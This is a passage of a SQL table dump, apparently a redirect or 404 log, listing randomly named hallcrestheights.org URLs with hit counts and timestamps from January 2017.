00:00:00'),(3021,'http://www.hallcrestheights.org/upttm-nbea-tgrb-i20162633-nqcdcncx-k11184-rdhcpgzz-dllimv-yxjlt-feobke-bwivs-mqkrfbm.htm',NULL,'','',1,0,'2017-01-08 12:10:30','0000-00-00 00:00:00'),(3022,'http://www.hallcrestheights.org/ixnmuea-k58888-hwhiozhj-i20162630-xbnwpgey-ooayiku-ksszqc-ebaqd-omytniho-lbde-ntafym.htm',NULL,'','',1,0,'2017-01-08 12:13:21','0000-00-00 00:00:00'),(3023,'http://www.hallcrestheights.org/i20162632-nfrkop-dobbumgo-k40189-lzes-rkwtz-qtqb-svjcwjb-xnmyvss/',NULL,'','',1,0,'2017-01-08 12:16:11','0000-00-00 00:00:00'),(3024,'http://www.hallcrestheights.org/vqjny-i20162637-spvh/k10934-oljp-eurrtpil.htm',NULL,'','',1,0,'2017-01-08 12:17:28','0000-00-00 00:00:00'),(3025,'http://www.hallcrestheights.org/mrcqgbe-k32428-ifuwgrab-tnwyrqse-mgwkowh-i20162632-memxgk-ucybn-pzkicvej-xkul-zjcjkn.htm',NULL,'','',1,0,'2017-01-08 12:19:01','0000-00-00 00:00:00'),(3026,'http://www.hallcrestheights.org/xhajvq-lwczbiqs-k25599-osqx-i20162629-oqkgq/aqyd-cptznzv-tjqoevp-caqwj-aluwty-bckb-sxbnbgnn/',NULL,'','',1,0,'2017-01-08 12:19:12','0000-00-00 00:00:00'),(3027,'http://www.hallcrestheights.org/yemb-i20162629-jvhtqqd-ckzfltz-terqb/wnswn-snjplpf-trrj-ncypjoqw-gzjev-ihsdpa-caylh-k19055-yayzeue/',NULL,'','',1,0,'2017-01-08 12:20:53','0000-00-00 00:00:00'),(3028,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-kvum-zbsai-i20162636-imjz-fozgdvd-k10849-dqjvdob/',NULL,'','',3,0,'2017-01-08 12:21:50','0000-00-00 00:00:00'),(3029,'http://www.hallcrestheights.org/zmku-edtzjiv-i20162630-k22682-yoqxi-fgxuhx/ptvuhmi-wnzkorpv-ubfgnqt-pmhprbik-zonm-tlajholj-rdkltsqw-xxuijhd.htm',NULL,'','',1,0,'2017-01-08 12:22:40','0000-00-00 00:00:00'),(3030,'http://www.hallcrestheights.org/htxwhy-k39349-krsvsvhu-dykb-qxdos-fiet-yuaixnr-bdggsaa-i20162635-rhefs-kjydmr/',NULL,'','',1,0,'2017-01-08 12:24:18','0000-00-00 00:00:00'),(3031,'http://www.hallcrestheights.org/k15955-tkuy-kfjdnjj/bucyupa-jaylr-i20162629-lwfvd/',NULL,'','',1,0,'2017-01-08 12:26:00','0000-00-00 00:00:00'),(3032,'http://www.hallcrestheights.org/soegsz-xyifetvt-ndyu-i20162628-uhvfc-yzls-xxqroxa-k48649-ehkskxy/',NULL,'','',1,0,'2017-01-08 12:27:31','0000-00-00 00:00:00'),(3033,'http://www.hallcrestheights.org/pcscq-rufu-i20162632-npkw-xpoideot-k48264-wtvsoarm-osmgep-lalhe-liyrqi-yqfuf-xvugowo.htm',NULL,'','',1,0,'2017-01-08 12:36:01','0000-00-00 00:00:00'),(3034,'http://www.hallcrestheights.org/mrcqgbe-k25408-ifuwgrab-tnwyrqse-mgwkowh-memxgk-ucybn-i20162634-pzkicvej-xkul-zjcjkn.htm',NULL,'','',1,0,'2017-01-08 12:41:40','0000-00-00 00:00:00'),(3035,'http://www.hallcrestheights.org/tkuy-i20162629-kfjdnjj/bucyupa-k36755-jaylr/',NULL,'','',1,0,'2017-01-08 12:44:19','0000-00-00 00:00:00'),(3036,'http://www.hallcrestheights.org/i20162632-ajqxxu-k38389-cuzaofif-ephi-ijimj-njbo-gtsakbc-cgyfmdv/',NULL,'','',1,0,'2017-01-08 12:47:23','0000-00-00 00:00:00'),(3037,'http://www.hallcrestheights.org/i20162632-yembjv-htqqdckz-fltz-k60889-terqb-wnsw-nsnjplp-ftrrjnc/',NULL,'','',3,0,'2017-01-08 12:50:10','0000-00-00 00:00:00'),(3038,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-i20162632-ephi-ijimj/njbo-gtsakbc-cgyfmdv-juxzl-ektsls-k39039-hxos/',NULL,'','',1,0,'2017-01-08 12:51:36','0000-00-00 00:00:00'),(3039,'http://www.hallcrestheights.org/oiyizgo-lrcmw-fbsnop/dgfnhs-k61303-krljr-gfct-i20162631-fzfiwx/',NULL,'','',1,0,'2017-01-08 12:53:19','0000-00-00 00:00:00'),(3040,'http://www.hallcrestheights.org/i20162635-edzvdl-k9466-qcomnn/mmcawv-bfuj-apyvrl.htm',NULL,'','',1,0,'2017-01-08 12:55:00','0000-00-00 00:00:00'),(3041,'http://www.hallcrestheights.org/vqjnys-pvholj-peurrt-pilu-ourxiv-i20162635-lbtrhn-k9816-nmtqz-kowtsxp-pbgrrcd-sikibk.htm',NULL,'','',1,0,'2017-01-08 12:55:51','0000-00-00 00:00:00'),(3042,'http://www.hallcrestheights.org/bsoapaz-i20162631-apsta-sgmhcq-k61053-cmckfr-dtfkg-pvbc-hsiwho-rklvzr-tjrsyoa-ayfwg/',NULL,'','',1,0,'2017-01-08 12:56:43','0000-00-00 00:00:00'),(3043,'http://www.hallcrestheights.org/jgletk-ymdrqz-i20162634-k51466-nrvmlk/swaz-vkecqq-neeiaq-jzlnp.htm',NULL,'','',1,0,'2017-01-08 12:58:26','0000-00-00 00:00:00'),(3044,'http://www.hallcrestheights.org/ixnmueah-whioz-k36450-hjxbnwpg/i20162635-eyooayi-kuks-szqce-baqdom-ytni.htm',NULL,'','',1,0,'2017-01-08 13:00:09','0000-00-00 00:00:00'),(3045,'http://www.hallcrestheights.org/soeg-i20162629-szxyife/tvtndyu-k28655-uhvfc/',NULL,'','',1,0,'2017-01-08 13:01:50','0000-00-00 00:00:00'),(3046,'http://www.hallcrestheights.org/ryvhrhm-qtyysllg-k11378-eajanpdm-efnxhqf/hjdyha-i20162633-oxrcj-hwuvdsve-zytw-lcycws-cpua-kqnj-tnply.htm',NULL,'','',1,0,'2017-01-08 13:03:32','0000-00-00 00:00:00'),(3047,'http://www.hallcrestheights.org/xhajvql-wczbi/i20162630-qsosqx-k56123-oqkgqa/',NULL,'','',1,0,'2017-01-08 13:06:58','0000-00-00 00:00:00'),(3048,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-k47749-ephi-i20162628-ijimj-njbo-gtsakbc-cgyfmdv/',NULL,'','',1,0,'2017-01-08 13:07:12','0000-00-00 00:00:00'),(3049,'http://www.hallcrestheights.org/yembj-k13257-vhtqqd-ckzfl-i20162635-tzte-rqbwnsw-nsnjplpf-trrjncyp-joqwgzj/',NULL,'','',1,0,'2017-01-08 13:10:05','0000-00-00 00:00:00'),(3050,'http://www.hallcrestheights.org/fadlajf-k30628-nlgfpcvw-gmyhdecw-xbdeudk-i20162632-ovfiib-ptquh-zxchhrmx-agfp-apuhgf.htm',NULL,'','',1,0,'2017-01-08 13:12:51','0000-00-00 00:00:00'),(3051,'http://www.hallcrestheights.org/lugdltr-k38188-smxxhypz-i20162630-qjllzohn-jumntec-wfogyw-biwyr-urfgvfcw-qzhr-ibnkny.htm',NULL,'','',1,0,'2017-01-08 13:18:31','0000-00-00 00:00:00'),(3052,'http://www.hallcrestheights.org/ixnmu-eahw-i20162632-hioz-hjxbnwpg-k32784-eyooayik-uksszq-cebaq-domytn-iholb-dentafy.htm',NULL,'','',1,0,'2017-01-08 13:21:20','0000-00-00 00:00:00'),(3053,'http://www.hallcrestheights.org/ixnmu-eahw-i20162632-hioz-hjxbnwpg-k49164-eyooayik-uksszq-cebaq-domytn-iholb-dentafy.htm',NULL,'','',1,0,'2017-01-08 13:24:10','0000-00-00 00:00:00'),(3054,'http://www.hallcrestheights.org/lugdltr-k52228-smxxhypz-qjllzohn-jumntec-i20162632-wfogyw-biwyr-urfgvfcw-qzhr-ibnkny.htm',NULL,'','',1,0,'2017-01-08 13:27:01','0000-00-00 00:00:00'),(3055,'http://www.hallcrestheights.org/edzvd-lqco-mnnm/mcawvbfu-i20162636-japyvrlf-k52834-lxhqjk-uhkcm.htm',NULL,'','',1,0,'2017-01-08 13:27:25','0000-00-00 00:00:00'),(3056,'http://www.hallcrestheights.org/oiyi-i20162629-zgolrcm/wfbsnop-dgfnh-skrlj-k18455-rgfctfz/',NULL,'','',1,0,'2017-01-08 13:29:09','0000-00-00 00:00:00'),(3057,'http://www.hallcrestheights.org/vqjnys-pvholj/k10466-peurrt-i20162635-pilu.htm',NULL,'','',1,0,'2017-01-08 13:32:32','0000-00-00 00:00:00'),(3058,'http://www.hallcrestheights.org/pcscq-rufu-i20162632-npkw-xpoideot-k31884-wtvsoarm-osmgep-lalhe-liyrqi-yqfuf-xvugowo.htm',NULL,'','',1,0,'2017-01-08 13:32:41','0000-00-00 00:00:00'),(3059,'http://www.hallcrestheights.org/soegsz-i20162629-k14849-xyifetvt-ndyu-uhvfc/',NULL,'','',1,0,'2017-01-08 13:35:57','0000-00-00 00:00:00'),(3060,'http://www.hallcrestheights.org/vqjny-spvh-oljp-eurrtpil/uourxivl-btrhnn-k534-mtqzk-i20162633-owtsxp-pbgrr-cdsikib-kxnpfov.htm',NULL,'','',1,0,'2017-01-08 13:37:40','0000-00-00 00:00:00'),(3061,'http://www.hallcrestheights.org/bsoap-k54657-azapst-i20162634-asgmh-cqcm-ckfrdtf-kgpvbchs-iwhorklv-zrtjrsy/',NULL,'','',1,0,'2017-01-08 13:38:20','0000-00-00 00:00:00'),(3062,'http://www.hallcrestheights.org/pcsc-qrufunp-kwxpo-ideotw/tvsoarm-osmgepla-lheliyr-k31962-qiyqfufx-i20162634-vugo-wopegtqa-mzimczjv.htm',NULL,'','',1,0,'2017-01-08 13:39:23','0000-00-00 00:00:00'),(3063,'http://www.hallcrestheights.org/cwhr-i20162629-iwgpekz/qdwkvum-zbsai-imjzf-k59495-ozgdvdd/',NULL,'','',1,0,'2017-01-08 13:41:05','0000-00-00 00:00:00'),(3064,'http://www.hallcrestheights.org/ryvhrhm-k31528-qtyysllg-eajanpdm-efnxhqf-i20162632-hjdyha-oxrcj-hwuvdsve-zytw-lcycws.htm',NULL,'','',1,0,'2017-01-08 13:41:11','0000-00-00 00:00:00'),(3065,'http://www.hallcrestheights.org/htxwh-k33057-ykrsvs-i20162634-vhudy-kbqx-dosfiet-yuaixnrb-dggsaarh-efskjyd/',NULL,'','',1,0,'2017-01-08 13:46:53','0000-00-00 00:00:00'),(3066,'http://www.hallcrestheights.org/xhajv-qlwczb-i20162634-iqsos-qxoq-kgqaqyd-k53757-cptznzvt-jqoevpca-qwjaluw/',NULL,'','',1,0,'2017-01-08 13:49:41','0000-00-00 00:00:00'),(3067,'http://www.hallcrestheights.org/vqjnys-pvholj-peurrt-pilu-ourxiv-lbtrhn-k54276-nmtqz-i20162637-kowtsxp-pbgrrcd-sikibk.htm',NULL,'','',1,0,'2017-01-08 13:55:22','0000-00-00 00:00:00'),(3068,'http://www.hallcrestheights.org/ajqxxuc-k5473-uzaof-ifephi-i20162631-ijimjn-jbogt-sakb-ccgyfm-dvjuxz-lektsls/',NULL,'','',1,0,'2017-01-08 13:58:17','0000-00-00 00:00:00'),(3069,'http://www.hallcrestheights.org/xhaj-i20162629-vqlwczb/iqsosqx-oqkgq-aqydc-k16655-ptznzvt/',NULL,'','',1,0,'2017-01-08 13:59:52','0000-00-00 00:00:00'),(3070,'http://www.hallcrestheights.org/gnfznxv-jxpaltit-jshkyjyl-dpijaam-i20162634-durtae-npggw-tdvlxtdq-kunf-k4308-glqrhz-yonx.htm',NULL,'','',1,0,'2017-01-08 14:01:03','0000-00-00 00:00:00'),(3071,'http://www.hallcrestheights.org/kzpffm-sxklrded-hwge/fvbbg-i20162636-k10399-zagp-eciyyuw-uvfztji/',NULL,'','',1,0,'2017-01-08 14:01:33','0000-00-00 00:00:00'),(3072,'http://www.hallcrestheights.org/gnfznxv-i20162633-jxpaltit-jshkyjyl/k10678-dpijaam-durtae-npggw-tdvlxtdq.htm',NULL,'','',1,0,'2017-01-08 14:03:20','0000-00-00 00:00:00'),(3073,'http://www.hallcrestheights.org/nfrkopdo-k7741-bbum-golzesr-kwtzqtqb-svjcwjbx-i20162633-nmyv-sssl-djzna-ahjb/',NULL,'','',1,0,'2017-01-08 14:06:45','0000-00-00 00:00:00'),(3074,'http://www.hallcrestheights.org/k4920-mrcqgbei-fuwgr-i20162632-abtnwyrq-semgwko-whme-mxgku-cybnpz-kicv-ejxkulzj-cjkntsxj.htm',NULL,'','',1,0,'2017-01-08 14:09:31','0000-00-00 00:00:00'),(3075,'http://www.hallcrestheights.org/htxwhy-i20162629-k4249-krsvsvhu-dykb-qxdos-fiet-yuaixnr-bdggsaa-rhefs-kjydmr/',NULL,'','',1,0,'2017-01-08 14:12:21','0000-00-00 00:00:00'),(3076,'http://www.hallcrestheights.org/k4020-ryvhrhmq-tyysl-i20162632-lgeajanp-dmefnxh-qfhj-dyhao-xrcjhw-uvds-vezytwlc-ycwscpua.htm',NULL,'','',1,0,'2017-01-08 14:15:13','0000-00-00 00:00:00'),(3077,'http://www.hallcrestheights.org/tkuy-kfjdnjj-bucyupa-jaylr/lwfvd-k18555-yruqpkl-sdef-hxdfpdfu-fpfaj-i20162629-npvzat/',NULL,'','',1,0,'2017-01-08 14:16:55','0000-00-00 00:00:00'),(3078,'http://www.hallcrestheights.org/soegszx-k6373-yifet-vtndyu-i20162631-uhvfcy-zlsxx-qrox-aehksk-xyxemb-uqudtwq/',NULL,'','',1,0,'2017-01-08 14:18:05','0000-00-00 00:00:00'),(3079,'http://www.hallcrestheights.org/xhaj-i20162629-vqlwczb/iqsosqx-oqkgq-aqydc-k40055-ptznzvt/',NULL,'','',1,0,'2017-01-08 14:18:42','0000-00-00 00:00:00'),(3080,'http://www.hallcrestheights.org/i20162630-tkuykfj-dnjjb-ucyupa-k47103-jaylrl/wfvdy-ruqp-klsdef-hxdfpd-fufpfaj-npvza/',NULL,'','',2,0,'2017-01-08 14:20:23','0000-00-00 00:00:00'),(3081,'http://www.hallcrestheights.org/yembjvht-k28441-qqdc-kzfltzt-erqbwnsw-nsnjplpf-i20162633-trrj-ncyp-joqwg-zjev/',NULL,'','',1,0,'2017-01-08 14:20:58','0000-00-00 00:00:00'),(3082,'http://www.hallcrestheights.org/soeg-szxyife-k39055-tvtndyu/uhvfc-i20162629-yzlsx-xqroxae-hksk/',NULL,'','',1,0,'2017-01-08 14:22:04','0000-00-00 00:00:00'),(3083,'http://www.hallcrestheights.org/xhaj-i20162629-k58645-vqlwczb-iqsosqx-oqkgq-aqydc-ptznzvt-jqoe-vpcaqwja-luwty/',NULL,'','',1,0,'2017-01-08 14:23:41','0000-00-00 00:00:00'),(3084,'http://www.hallcrestheights.org/kzpffms-xklrd-edhwge-fvbbgz/i20162630-agpec-k56523-iyyu-wuvfzt-jigjin-amzbcng-tfmly-rghdf/',NULL,'','',1,0,'2017-01-08 14:23:47','0000-00-00 00:00:00'),(3085,'http://www.hallcrestheights.org/i20162632-vqjny-spvh-oljp/eurrtpil-uourxivl-btrhnn-k31734-mtqzk-owtsxp.htm',NULL,'','',1,0,'2017-01-08 14:25:28','0000-00-00 00:00:00'),(3086,'http://www.hallcrestheights.org/k5820-dvisciwb-vwkux-i20162632-krbzomsm-vuclzup-hvqa-wuoxz-mnpzvs-gcrl-ycmczoqq-eludpwcm.htm',NULL,'','',1,0,'2017-01-08 14:26:30','0000-00-00 00:00:00'),(3087,'http://www.hallcrestheights.org/edzvdlq-k52678-comnnmmc-awvbfuja-pyvrlfl/i20162632-xhqjku-hkcmu-mbhmgznk-ohey-rupxpu.htm',NULL,'','',1,0,'2017-01-08 14:27:09','0000-00-00 00:00:00'),(3088,'http://www.hallcrestheights.org/k9240-zmkuedtz-jivyo-qxifgxuh-xptvuhm-iwnz-korpv-ubfgnq-tpmh-i20162628-prbikzon-mtlajhol.htm',NULL,'','',1,0,'2017-01-08 14:29:20','0000-00-00 00:00:00'),(3089,'http://www.hallcrestheights.org/edzvdlq-comnnmmc-awvbfuja-i20162633-pyvrlfl-xhqjku-hkcmu-mbhmgznk-ohey-k10428-rupxpu-dzik.htm',NULL,'','',1,0,'2017-01-08 14:32:17','0000-00-00 00:00:00'),(3090,'http://www.hallcrestheights.org/oiyi-i20162629-k28205-zgolrcm-wfbsnop-dgfnh/',NULL,'','',1,0,'2017-01-08 14:32:27','0000-00-00 00:00:00'),(3091,'http://www.hallcrestheights.org/i20162628-k15992-edzv-dlqcomn-nmmca-wvbfuj.htm',NULL,'','',1,0,'2017-01-08 14:35:04','0000-00-00 00:00:00'),(3092,'http://www.hallcrestheights.org/i20162628-k16892-gnfz-nxvjxpa-ltitj-shkyjy.htm',NULL,'','',1,0,'2017-01-08 14:37:51','0000-00-00 00:00:00'),(3093,'http://www.hallcrestheights.org/k33632-vqjn-yspvhol-i20162630-jpeur-rtpilu.htm',NULL,'','',1,0,'2017-01-08 14:40:40','0000-00-00 00:00:00'),(3094,'http://www.hallcrestheights.org/i20162628-k58292-fadl-ajfnlgf-pcvwg-myhdec.htm',NULL,'','',1,0,'2017-01-08 14:43:31','0000-00-00 00:00:00'),(3095,'http://www.hallcrestheights.org/k22976-gnfznx-i20162637-vjxpal-titjsh-kyjy.htm',NULL,'','',1,0,'2017-01-08 14:47:38','0000-00-00 00:00:00'),(3096,'http://www.hallcrestheights.org/xhajvql-wczbi/qsosqx-i20162631-k60803-oqkgqa/',NULL,'','',1,0,'2017-01-08 14:47:57','0000-00-00 00:00:00'),(3097,'http://www.hallcrestheights.org/k62216-ixnmue-ahwhio-i20162634-zhjxbn-wpge.htm',NULL,'','',1,0,'2017-01-08 14:49:11','0000-00-00 00:00:00'),(3098,'http://www.hallcrestheights.org/oiyizgo-lrcmw/i20162630-fbsnop-dgfnhs-krljr-k47003-gfct/',NULL,'','',1,0,'2017-01-08 14:49:26','0000-00-00 00:00:00'),(3099,'http://www.hallcrestheights.org/ajqx-i20162629-xucuzao/fifephi-k16055-ijimj/',NULL,'','',1,0,'2017-01-08 14:51:08','0000-00-00 00:00:00'),(3100,'http://www.hallcrestheights.org/k12932-zmku-edtzjiv-i20162630-yoqxi-fgxuhx.htm',NULL,'','',1,0,'2017-01-08 14:52:13','0000-00-00 00:00:00'),(3101,'http://www.hallcrestheights.org/zmkue-dtzj-k52634-ivyo-qxifgxuh/i20162632-xptvuhmi-wnzkor-pvubf-gnqtpm-hprbi-kzonmtl-ajholjr-dklt.htm',NULL,'','',1,0,'2017-01-08 14:52:56','0000-00-00 00:00:00'),(3102,'http://www.hallcrestheights.org/cwhriw-i20162629-gpekzqdw/kvum-zbsai-imjz-k25799-fozgdvd/',NULL,'','',1,0,'2017-01-08 14:54:30','0000-00-00 00:00:00'),(3103,'http://www.hallcrestheights.org/nfrkop-i20162629-dobbumgo-lzes-rkwtz/qtqb-svjcwjb-xnmyvss-sldjz-naahjb-kwxr-osholvgw-k25499-xkwoihom/',NULL,'','',1,0,'2017-01-08 14:56:09','0000-00-00 00:00:00'),(3104,'http://www.hallcrestheights.org/k41516-lugdlt-rsmxxh-i20162634-ypzqjl-lzoh.htm',NULL,'','',1,0,'2017-01-08 14:57:43','0000-00-00 00:00:00'),(3105,'http://www.hallcrestheights.org/xhaj-vqlwczb-k7555-iqsosqx/oqkgq-i20162629-aqydc-ptznzvt-jqoe/',NULL,'','',1,0,'2017-01-08 14:57:55','0000-00-00 00:00:00'),(3106,'http://www.hallcrestheights.org/ryvh-rhmqtyy-k42162-sllge-ajanpd/i20162634-mefnxhq-fhjdyhao-xrcjhwu-vdsvezyt-wlcy-cwscpuak.htm',NULL,'','',1,0,'2017-01-08 14:59:34','0000-00-00 00:00:00'),(3107,'http://www.hallcrestheights.org/i20162628-k36692-mrcq-gbeifuw-grabt-nwyrqs.htm',NULL,'','',1,0,'2017-01-08 14:59:49','0000-00-00 00:00:00'),(3108,'http://www.hallcrestheights.org/k44576-jgletk-i20162637-ymdrqz-nrvmlk-swaz.htm',NULL,'','',1,0,'2017-01-08 15:07:55','0000-00-00 00:00:00'),(3109,'http://www.hallcrestheights.org/k61316-pcscqr-ufunpk-i20162634-wxpoid-eotw.htm',NULL,'','',1,0,'2017-01-08 15:12:19','0000-00-00 00:00:00'),(3110,'http://www.hallcrestheights.org/k20312-mrcq-gbeifuw-i20162634-grabt-nwyrqs.htm',NULL,'','',1,0,'2017-01-08 15:14:09','0000-00-00 00:00:00'),(3111,'http://www.hallcrestheights.org/nfrk-opdobbu-mgolzes/rkwtz-i20162629-qtqbs-vjcwjbx-k39955-nmyv/',NULL,'','',1,0,'2017-01-08 15:17:05','0000-00-00 00:00:00'),(3112,'http://www.hallcrestheights.org/fadl-ajfnlgf-pcvwg-myhdec/i20162630-wxbdeud-kovfiibp-tquhzxc-hhrmxagf-k44382-papu-hgfqvjdc-lbbvzgrc.htm',NULL,'','',1,0,'2017-01-08 15:18:55','0000-00-00 00:00:00'),(3113,'http://www.hallcrestheights.org/k19916-fadlaj-fnlgfp-cvwgmy-i20162635-hdec.htm',NULL,'','',1,0,'2017-01-08 15:20:42','0000-00-00 00:00:00'),(3114,'http://www.hallcrestheights.org/yembjvh-i20162631-tqqdc-kzfltz-k60603-terqbw/nswns-njpl-pftrrj-ncypjo-qwgzjev-ihsdp/',NULL,'','',1,0,'2017-01-08 15:20:59','0000-00-00 00:00:00'),(3115,'http://www.hallcrestheights.org/ajqx-i20162629-k16705-xucuzao-fifephi-ijimj-njbog-tsakbcc-gyfm-dvjuxzle-ktsls/',NULL,'','',1,0,'2017-01-08 15:22:57','0000-00-00 00:00:00'),(3116,'http://www.hallcrestheights.org/k43676-dvisci-i20162637-wbvwku-xkrbzo-msmv.htm',NULL,'','',1,0,'2017-01-08 15:24:34','0000-00-00 00:00:00'),(3117,'http://www.hallcrestheights.org/soegsz-k38899-xyifetvt-ndyu-uhvfc/yzls-xxqroxa-ehkskxy-i20162635-xembu-qudtwq/',NULL,'','',1,0,'2017-01-08 15:25:39','0000-00-00 00:00:00'),(3118,'http://www.hallcrestheights.org/htxw-i20162629-hykrsvs-vhudykb-qxdos-fiety-k58745-uaixnrb-dggs-aarhefsk-jydmr-ujwimj-qiaau-rihcywn/',NULL,'','',1,0,'2017-01-08 15:27:07','0000-00-00 00:00:00'),(3119,'http://www.hallcrestheights.org/i20162628-dvis-k26542-ciwbvwk-uxkrb-zomsmv/uclzuph-vqawuoxz-mnpzvsg-crlycmcz-oqqe.htm',NULL,'','',1,0,'2017-01-08 15:28:56','0000-00-00 00:00:00'),(3120,'http://www.hallcrestheights.org/kzpff-msxklr-i20162634-dedhw-gefv-bbgzagp-k54157-eciyyuwu-vfztjigj/',NULL,'','',1,0,'2017-01-08 15:30:39','0000-00-00 00:00:00'),(3121,'http://www.hallcrestheights.org/lugdlt-rsmxxh-k9666-ypzqjl/i20162635-lzoh-njumnt-ecwfog-ywbiw-yrurfgv.htm',NULL,'','',1,0,'2017-01-08 15:30:55','0000-00-00 00:00:00'),(3122,'http://www.hallcrestheights.org/yemb-jvhtqqd-ckzfltz-terqb-i20162629-k8005-wnswn-snjplpf-trrj/',NULL,'','',1,0,'2017-01-08 15:32:21','0000-00-00 00:00:00'),(3123,'http://www.hallcrestheights.org/i20162628-k57392-zmku-edtzjiv-yoqxi-fgxuhx.htm',NULL,'','',1,0,'2017-01-08 15:38:17','0000-00-00 00:00:00'),(3124,'http://www.hallcrestheights.org/k53432-edzv-dlqcomn-i20162630-nmmca-wvbfuj.htm',NULL,'','',1,0,'2017-01-08 15:39:15','0000-00-00 00:00:00'),(3125,'http://www.hallcrestheights.org/qlbowcig-gece-i20162634-ayafxrg-lnikghhm-k55381-bbxpgesm-rcai-ztbi/',NULL,'','',2,0,'2017-01-08 15:40:42','0000-00-00 00:00:00'),(3126,'http://www.hallcrestheights.org/k42812-ryvh-rhmqtyy-i20162634-sllge-ajanpd.htm',NULL,'','',1,0,'2017-01-08 15:46:19','0000-00-00 00:00:00'),(3127,'http://www.hallcrestheights.org/k40616-upttmn-beatgr-i20162634-bnqcdc-ncxr.htm',NULL,'','',1,0,'2017-01-08 15:50:37','0000-00-00 00:00:00'),(3128,'http://www.hallcrestheights.org/i20162635-ryvhrh-k16-mqtyys-llgeaj-anpd-mefnxh.htm',NULL,'','',2,0,'2017-01-08 15:52:14','0000-00-00 00:00:00'),(3129,'http://www.hallcrestheights.org/htxwhykr-i20162633-svsv-hudykbq-xdosfiet-yuaixnrb-dggs-k28741-aarh/',NULL,'','',1,0,'2017-01-08 15:54:32','0000-00-00 00:00:00'),(3130,'http://www.hallcrestheights.org/i20162636-dvisc-iwbv/k52334-wkux-krbzomsm.htm',NULL,'','',1,0,'2017-01-08 15:56:09','0000-00-00 00:00:00'),(3131,'http://www.hallcrestheights.org/i20162636-k4580-upttmnbe-atgrb-nqcdcncx-rdhcpgz.htm',NULL,'','',1,0,'2017-01-08 15:58:10','0000-00-00 00:00:00'),(3132,'http://www.hallcrestheights.org/nfrk-i20162629-opdobbu/mgolzes-rkwtz-qtqbs-k37355-vjcwjbx/',NULL,'','',1,0,'2017-01-08 15:59:03','0000-00-00 00:00:00'),(3133,'http://www.hallcrestheights.org/xhajvql-wczbi-i20162630-qsosqx-oqkgqa-qydcp-k47153-tznz-vtjqoe-vpcaqw-jaluwty-bckbs-xbnbg-nndorcaj/',NULL,'','',1,0,'2017-01-08 15:59:56','0000-00-00 00:00:00'),(3134,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm/vuclzup-i20162636-hvqa-wuoxz-k36630-mnpzvs-gcrl.htm',NULL,'','',1,0,'2017-01-08 16:00:51','0000-00-00 00:00:00'),(3135,'http://www.hallcrestheights.org/k51920-ixnmueah-whioz-hjxbnwpg-i20162631-eyooayi.htm',NULL,'','',2,0,'2017-01-08 16:00:57','0000-00-00 00:00:00'),(3136,'http://www.hallcrestheights.org/ajqx-xucuzao-k26455-fifephi/ijimj-i20162629-njbog-tsakbcc-gyfm/',NULL,'','',1,0,'2017-01-08 16:01:12','0000-00-00 00:00:00'),(3137,'http://www.hallcrestheights.org/htxwhy-krsvsvhu/dykb-qxdos-i20162632-fiet-k60539-yuaixnr/',NULL,'','',1,0,'2017-01-08 16:02:00','0000-00-00 00:00:00'),(3138,'http://www.hallcrestheights.org/edzvd-lqco-mnnm-i20162633-mcawvbfu/k834-japyvrlf-lxhqjk-uhkcm-umbhmg-znkoh-eyrupxp.htm',NULL,'','',1,0,'2017-01-08 16:03:50','0000-00-00 00:00:00'),(3139,'http://www.hallcrestheights.org/k51020-pcscqruf-unpkw-xpoideot-i20162631-wtvsoar.htm',NULL,'','',1,0,'2017-01-08 16:04:47','0000-00-00 00:00:00'),(3140,'http://www.hallcrestheights.org/k49220-edzvdlqc-omnnm-mcawvbfu-i20162631-japyvrl.htm',NULL,'','',1,0,'2017-01-08 16:17:15','0000-00-00 00:00:00'),(3141,'http://www.hallcrestheights.org/tkuykfj-dnjjb-ucyupa-jaylrl-wfvdy-k5373-ruqp-klsdef-i20162631-hxdfpd/',NULL,'','',1,0,'2017-01-08 16:23:40','0000-00-00 00:00:00'),(3142,'http://www.hallcrestheights.org/edzvd-lqco-mnnm-i20162633-mcawvbfu/k5514-japyvrlf-lxhqjk-uhkcm-umbhmg-znkoh-eyrupxp.htm',NULL,'','',1,0,'2017-01-08 16:34:30','0000-00-00 00:00:00'),(3143,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-yupa-jaylr/lwfv-dyruqpk-i20162636-lsdefhx-dfpdf-ufpfaj-k10599-npvz/',NULL,'','',1,0,'2017-01-08 16:34:57','0000-00-00 00:00:00'),(3144,'http://www.hallcrestheights.org/yembjvh-tqqdc-kzfltz-terqbw-nswns-k7173-njpl-pftrrj-i20162631-ncypjo/',NULL,'','',1,0,'2017-01-08 16:36:57','0000-00-00 00:00:00'),(3145,'http://www.hallcrestheights.org/gnfzn-xvjx-k42554-palt-itjshkyj/yldpijaa-mdurta-enpgg-wtdvlx-i20162636-tdqku-nfglqrh-zyonxfe-qnzs.htm',NULL,'','',1,0,'2017-01-08 16:37:26','0000-00-00 00:00:00'),(3146,'http://www.hallcrestheights.org/jgle-tkymdrq-k31862-znrvm-lkswaz/vkecqqn-eeiaqjzl-i20162634-nplqfcn-ebxilnvo-xbdj-veebikpt-jvlxfaye-ayabopl.htm',NULL,'','',1,0,'2017-01-08 16:38:19','0000-00-00 00:00:00'),(3147,'http://www.hallcrestheights.org/gnfz-nxvjxpa-i20162628-ltitj-shkyjy/ldpijaa-mdurtaen-pggwtdv-lxtdqkun-fglq-rhzyonxf-k47442-eqnzsvvb.htm',NULL,'','',1,0,'2017-01-08 16:39:26','0000-00-00 00:00:00'),(3148,'http://www.hallcrestheights.org/i20162628-k17540-ryvhrhmq-tyysl-lgeajanp-dmefnxh.htm',NULL,'','',1,0,'2017-01-08 16:41:51','0000-00-00 00:00:00'),(3149,'http://www.hallcrestheights.org/k26000-fadlajfn-lgfpc-vwgmyhde-i20162635-cwxbdeu.htm',NULL,'','',1,0,'2017-01-08 16:44:00','0000-00-00 00:00:00'),(3150,'http://www.hallcrestheights.org/k59840-vqjnyspv-i20162637-holjp-eurrtpil-uourxiv.htm',NULL,'','',1,0,'2017-01-08 16:45:24','0000-00-00 00:00:00'),(3151,'http://www.hallcrestheights.org/ajqxxuc-k8073-uzaof-ifephi-ijimjn-jbogt-sakb-ccgyfm-i20162631-dvjuxz/',NULL,'','',1,0,'2017-01-08 16:45:42','0000-00-00 00:00:00'),(3152,'http://www.hallcrestheights.org/i20162632-k16820-ixnmueah-whioz-hjxbnwpg-eyooayi.htm',NULL,'','',1,0,'2017-01-08 16:50:42','0000-00-00 